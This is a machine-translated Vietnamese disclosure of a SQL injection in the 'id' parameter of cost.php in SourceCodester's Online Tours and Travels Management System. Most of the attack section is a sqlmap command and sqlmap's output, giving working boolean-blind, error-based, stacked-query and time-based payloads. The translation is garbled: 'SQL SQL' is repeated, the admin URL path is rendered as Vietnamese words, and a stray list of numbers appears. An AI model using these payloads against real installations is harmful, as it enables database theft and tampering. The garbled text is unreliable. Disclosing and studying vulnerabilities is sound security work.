Bài báo tiết lộ rằng có một lỗ hổng SQL SQL ở dòng 47 của tệp PHP cost.php của hệ thống quản lý du lịch trực tuyến. Kẻ tấn công có thể sử dụng dữ liệu đầu vào chưa được xác minh để xây dựng một truy vấn SQL độc hại, điều này có thể dẫn đến rò rỉ dữ liệu hoặc thao túng hệ thống. Công cụ SQLMap phát hiện nhiều loại điểm chèn, bao gồm chèn mù Boolean, chèn dựa trên lỗi, truy vấn xếp chồng và chèn mù thời gian.
SourceCodester Hệ thống quản lý chuyến tham quan và du lịch trực tuyến cost.php sql
Url: quản trị viên/hoạt động/chi phí.php
Trừu tượng:
Dòng 47 của cost.php gọi một truy vấn SQL được xây dựng bằng cách sử dụng dữ liệu đầu vào không được xác thực. Lệnh gọi này có thể cho phép kẻ tấn công sửa đổi ý nghĩa của câu lệnh hoặc thực thi các lệnh SQL tùy ý.
Giải trình:
Lỗi SQL SQL xảy ra khi:
Dữ liệu vào một chương trình từ một nguồn không đáng tin cậy.
Dữ liệu được sử dụng để xây dựng một truy vấn SQL một cách linh hoạt.
Trong trường hợp này, dữ liệu được chuyển tới exec() trong cost.php ở dòng 47.


python sqlmap.py -r sql.txt



sqlmap identified the following injection point(s) with a total of 388 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (3819=3819) THEN 1 ELSE 0x28 END))-- ksPx
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(3386,CONCAT(0x5c,0x717a767a71,(SELECT (ELT(3386=3386,1))),0x717a7a6a71))-- JVAA
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: id=1' AND 8763=BENCHMARK(5000000,MD5(0x66444f68))-- EOfz
---
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- số 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
Mã tải xuống:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-USE-php-and-mysql.html